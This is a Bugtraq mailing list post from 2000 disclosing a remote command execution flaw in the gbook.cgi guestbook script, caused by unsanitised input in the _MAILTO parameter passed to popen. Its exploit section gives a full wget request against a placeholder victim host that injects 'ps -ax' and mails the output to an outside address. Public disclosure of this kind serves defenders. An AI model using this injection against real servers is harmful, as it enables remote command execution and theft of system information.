Bugtraq mailing list archives
[hacksware] gbook.cgi remote command execution vulnerability
From: JW Oh <mat () IVNTECH COM>
Date: Fri, 10 Nov 2000 20:38:44 +0900
Bug Report 1. Name: gbook.cgi remote command execution vulnerability 2. Release Date: 2000.11.10 3. Affected Application: GBook - A web site guestbook By Bill Kendrick kendrick () zippy sonoma edu http://zippy.sonoma.edu/kendrick/ 4. Author: mat () hacksware com 5. Type: Input validation Error 6. Explanation gbook.cgi is used by some web sites. We can set _MAILTO parameter, and popen is called to execute mail command. If ';' is used in _MAILTO variable, you can execute arbitrary command with it. It's so trivial. :) 7. Exploits This exploit executes "ps -ax" command and sends the result to haha () yaho com. wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha () yaho com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe () yaho com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few" ================================================= | mat () hacksware com | | http://hacksware.com | =================================================
Current thread:
- [hacksware] gbook.cgi remote command execution vulnerability JW Oh (Nov 11)